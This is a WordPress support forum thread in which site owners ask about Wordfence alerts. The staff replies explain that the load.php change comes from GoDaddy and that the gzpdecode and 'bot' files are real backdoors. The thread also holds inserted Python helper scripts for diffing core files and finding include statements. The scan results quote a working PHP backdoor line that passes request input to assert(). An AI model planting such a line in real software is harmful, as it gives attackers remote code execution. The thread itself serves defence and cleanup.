Support » Plugin: Wordfence Security - Firewall & Malware Scan » Scan has new problem: WordPress core file modified: wp-includes/load.php

  • Resolved gnc99

    (@gnc99)


    The Wordfence scan on my site had a new problem message today:
    “WordPress core file modified: wp-includes/load.php”.
    Filename: wp-includes/load.php
    File type: Core
    Issue first detected: 8 hours 1 min ago.
    Severity: Critical
    Status New
    This WordPress core file has been modified and differs from the original file distributed with this version of WordPress.
    —————————
    I’ve made no modifications to that file. One of the options below the message was “Restore the original version of this file”.
    After I selected that option, the message returned was “An error occurred. We could not write to that file. You may not have permission to modify files on your WordPress server.”

    I’m one of two administrators (the only administrator on the site); neither of us has touched that file, so it seems something else has been changed. Is this a known malware scenario? How do I go about cleaning/fixing? My site is www.

Viewing 15 replies - 1 through 15 (of 21 total)
  • Having the same problem as @gnc99!

    Also getting this notification:

    Wordfence found the following new issues on ”
    Notice: Indirect modification of overloaded element of WP_Hook has no effect in /home/content/p3pnexwpnas01_data02/21/2880721/html/wp-content/object-cache.php on line 664

    Notice: Indirect modification of overloaded element of WP_Hook has no effect in /home/content/p3pnexwpnas01_data02/21/2880721/html/wp-content/object-cache.php on line 664
    Bree Brouwer”.

    Von

    (@vondielozano)

    Also getting this notification on my site:

    WordPress core file modified: wp-includes/load.php

    When I click “view activity file”:

    Indirect modification of overloaded element of WP_Hook has no effect in /home/content/p3pnexwpnas05_data01/11/2273111/html/wp-content/object-cache.php on line 664

    Is this a hack? It doesn’t look like one. Here’s the code difference with the repository (added)

    global $wp_filter;
    // Re-initialize any hooks added manually by object-cache.php
    if ( $wp_filter ) {
        $wp_filter = WP_Hook::build_preinitialized_hooks( $wp_filter );
    }

    wp-includes/load.php

    Subscribing to this thread. I’ve seen this file warning and other files too, on a recent scan. All plugins are up to date, WP versions updated and FTP and WP passwords are very strong.

    This one file:

    Filename:
    wp-load.php

    File type:
    Core

    Issue first detected:
    19 mins ago.

    Severity:
    Critical
    Status
    New
    This file appears to be installed by a hacker to perform malicious activity. If you know about this file you can choose to ignore it to exclude it from future scans. The text we found in this file that matches a known malicious file is: “@include( ABSPATH . WPINC . ‘/SimplePie/gzpdecode.php’);”. The infection type is: Backdoor:PHP/gzpdecode.


    Add – I uploaded a new version of wp-load.php right from a recently downloaded version of WP 4.7. I renamed the suspect file on the server to: wp-load-old.php. I then uploaded the new file, wp-load.php, did another scan and found that both files were tagged as malicious.

    Both the new and original file on the server have the same malicious code:

    The text we found in this file that matches a known malicious file is: “@include( ABSPATH . WPINC . ‘/SimplePie/gzpdecode.php’);”. The infection type is: Backdoor:PHP/gzpdecode.

    Following

    Following

    Hi
    I have had the same problem since the update to 4.7 of WordPress. I asked my hosting service, GoDaddy (Managed WordPress), about those changes and sent them the report that Wordfence generated and sent to my email. They told me that those files were changed by GoDaddy; they are not the result of hacking, but are some measure to prevent problems. The same might be happening with you.

    @fatimajesus, how many files are you referring to? I know this thread started with one file being an issue, but WF has flagged a few dozen in my latest scan as having malicious code.

    Same issue. Following.

    Plugin Author WFMattR

    (@wfmattr)

    Hi all,

    It looks like “wp-includes/load.php” is modified by GoDaddy on Managed WordPress hosting packages. If that is the only file being modified and you have only the same modifications that @zerojack mentioned, your site should be ok. (Note that Managed WordPress plans on GoDaddy prevent you from modifying your own site’s WP core files, so you cannot replace the file with the original version if you try.)

    A couple people also mentioned this message, which can be related:
    Notice: Indirect modification of overloaded element of WP_Hook
    That appears to be an issue on GoDaddy hosts after updating to WordPress 4.7 in their custom “object-cache.php” file. Wordfence and other plugins use WordPress’s built-in object cache. If you’re seeing this message, GoDaddy should be able to help. A temporary fix is to add this line to your wp-config.php file, just after the WP_DEBUG line — this prevents error messages from being displayed on the page, even if the underlying issue still occurs, so that regular visitors will not see the message:
    define('WP_DEBUG_DISPLAY', false);

    @lmd99: I think your site’s issue is different — “gzpdecode.php” is likely to be a real malicious file, being included from other files. There is a normal file named “gzdecode.php” (“gz…” rather than “gzp…”). We have a guide for cleaning hacked sites here: How to clean a hacked website

    Again, just to clarify — for anyone who only has the first two issues, they are not a sign of a hack, but only the “gzpdecode.php” issue mentioned above would be.

    -Matt R
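The check described in the reply above, written out as an added example (not Wordfence's code and not part of the original thread): diff the installed file against a pristine copy and report anything other than the five added lines posted earlier in this thread. The file contents below are short constructed stand-ins, and `unexplained_changes` is a hypothetical helper name.

```python
import difflib

# The five lines a poster in this thread reported as added to
# wp-includes/load.php, with leading whitespace stripped.
EXPECTED_ADDED = [
    "global $wp_filter;",
    "// Re-initialize any hooks added manually by object-cache.php",
    "if ( $wp_filter ) {",
    "$wp_filter = WP_Hook::build_preinitialized_hooks( $wp_filter );",
    "}",
]

# Constructed stand-in for a pristine core file (not the real load.php).
PRISTINE = """<?php
function wp_start_object_cache() {
    require_once( WP_CONTENT_DIR . '/object-cache.php' );
    wp_cache_init();
}
"""

# Constructed: the same file with the host's hook lines added.
HOST_PATCHED = """<?php
function wp_start_object_cache() {
    global $wp_filter;
    require_once( WP_CONTENT_DIR . '/object-cache.php' );
    // Re-initialize any hooks added manually by object-cache.php
    if ( $wp_filter ) {
        $wp_filter = WP_Hook::build_preinitialized_hooks( $wp_filter );
    }
    wp_cache_init();
}
"""

# Constructed: host lines plus the loader line Wordfence quoted in this thread.
LOADER = "@include( ABSPATH . WPINC . '/SimplePie/gzpdecode.php');"
TAMPERED = HOST_PATCHED.replace("<?php\n", "<?php\n" + LOADER + "\n", 1)

def unexplained_changes(pristine, installed):
    """List every changed line that the known host patch does not account for."""
    remaining = list(EXPECTED_ADDED)  # each expected line may be used only once
    findings = []
    for line in difflib.ndiff(pristine.splitlines(), installed.splitlines()):
        tag, text = line[:2], line[2:].strip()
        if tag == "+ " and text in remaining:
            remaining.remove(text)
        elif tag in ("+ ", "- ") and text:
            findings.append(tag + text)
    return findings

if __name__ == "__main__":
    print(unexplained_changes(PRISTINE, HOST_PATCHED))
    print(unexplained_changes(PRISTINE, TAMPERED))
```

An empty list means the file differs from the pristine copy only by the host's hook lines; any other entry needs a closer look.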

    Plugin Author WFMattR

    (@wfmattr)

    Update: It looks like GoDaddy may not need to fix the “Notice: Indirect modification …” message — another plugin author says this should be fixed in WP 4.7.1, and there is a trac item open that looks to be related:

    https://wordpress.org/support/topic/overloaded-elemet-of-wp_hook/
    https://core.trac.wordpress.org/ticket/39132

    -Matt R

    Hey Matt – thanks for your reply. What about this file notice? It’s one of many that are flagged as problematic, but before I get to notifying the site owner of the issue, then asking you guys to look into it (for a fee, yes I know), what can you tell us here? Is this example below an issue, false positive or what?

    File appears to be malicious: wp-includes/pomo/index.php

    Filename:
    wp-includes/pomo/index.php

    File type:
    Not a core, theme or plugin file.

    Issue first detected:
    4 hours 35 mins ago.

    Severity:
    Critical

    Status
    New
    This file appears to be installed by a hacker to perform malicious activity. If you know about this file you can choose to ignore it to exclude it from future scans. The text we found in this file that matches a known malicious file is: “if(isset($_REQUEST[‘bot’])) assert(stripslashes($_REQUEST[bot]));”. The infection type is: Backdoor:PHP/botrequest.

    Can these files just be removed? “this file appears to be installed by a hacker…”

    Plugin Author WFMattR

    (@wfmattr)

    Hi LMD99,

    Yes, that does appear to be a malicious file. It is usually ok to remove malicious files that aren’t identified as a part of WordPress core, plugins, or themes (especially if located in wp-includes or wp-admin) — but be careful if you have any premium plugins/themes on the site, since they can’t be matched to known files. If you have suspicious files in a plugin/theme folder, it is often easiest to remove and reinstall the plugin or theme.

    In some cases, there may be modified files that use PHP’s “require” keyword to load the malicious files, so if removing a file causes the site to stop working, you would need to find where it was being loaded from. (It should be visible in the site’s error log on most hosts.)

    I recommend making sure you also have a backup of the site before removing files, just in case you need to restore a file — even though the backup will contain the malicious files, it will also have copies of all the good files, in case you need them.

    -Matt R
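One way to find where a removed file was being loaded from, as an added example (not Wordfence's code and not part of the original thread): walk the site tree and list every include/require statement that names the file exactly. It goes slightly beyond the reply by covering `include`, `include_once` and `require_once` as well as `require`; the function names and the sample tree are constructed for illustration.

```python
import os
import re
import tempfile

# Matches an include/require statement up to its terminating semicolon.
STATEMENT_RE = re.compile(r"\b(?:include|require)(?:_once)?\b[^;\n]*", re.I)

def find_loaders(root, target):
    """Return sorted (relative path, line number, source line) for each
    include/require statement under `root` that names `target` exactly."""
    # Exact-name match, so the lookalike gzpdecode.php and the genuine
    # gzdecode.php are never confused with each other.
    name_re = re.compile(r"(?<![\w-])" + re.escape(target) + r"(?![\w-])")
    hits = []
    for dirpath, _dirs, files in os.walk(root):
        for fname in files:
            if not fname.lower().endswith((".php", ".inc", ".phtml")):
                continue
            path = os.path.join(dirpath, fname)
            with open(path, encoding="utf-8", errors="replace") as fh:
                for lineno, line in enumerate(fh, 1):
                    stmts = STATEMENT_RE.finditer(line)
                    if any(name_re.search(m.group(0)) for m in stmts):
                        rel = os.path.relpath(path, root)
                        hits.append((rel, lineno, line.strip()))
    return sorted(hits)

def build_sample_tree():
    """Constructed sample tree (not real WordPress files) in a temp directory."""
    root = tempfile.mkdtemp(prefix="wp-sample-")
    os.makedirs(os.path.join(root, "wp-includes"))
    samples = {
        # Loader line as quoted in the scan result earlier in this thread.
        "wp-load.php":
            "<?php\n@include( ABSPATH . WPINC . '/SimplePie/gzpdecode.php');\n",
        # Constructed reference to the genuine, similarly named file.
        "wp-includes/feed.php":
            "<?php\nrequire_once( ABSPATH . WPINC . '/SimplePie/gzdecode.php' );\n",
    }
    for rel, body in samples.items():
        with open(os.path.join(root, rel), "w", encoding="utf-8") as fh:
            fh.write(body)
    return root

if __name__ == "__main__":
    for rel, lineno, src in find_loaders(build_sample_tree(), "gzpdecode.php"):
        print(f"{rel}:{lineno}: {src}")
```

This only catches file names written literally in the statement; a loader that builds the name at run time will not match, and the site's error log remains the place to look in that case.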

    Following.
    WordPress core file modified: wp-includes/load.php

    Notice: Indirect modification of overloaded element of WP_Hook has no effect in /home/content/p3pnexwpnas13_data01/82/3090882/html/wp-content/object-cache.php on line 664

    I see GoDaddy mentioned, and I host on MediaTemple which is also now a GoDaddy company if I’m correct. Since we cannot modify core files, I assume we wait for our host to recognize and fix the cause of this error?

  • The topic ‘Scan has new problem: WordPress core file modified: wp-includes/load.php’ is closed to new replies.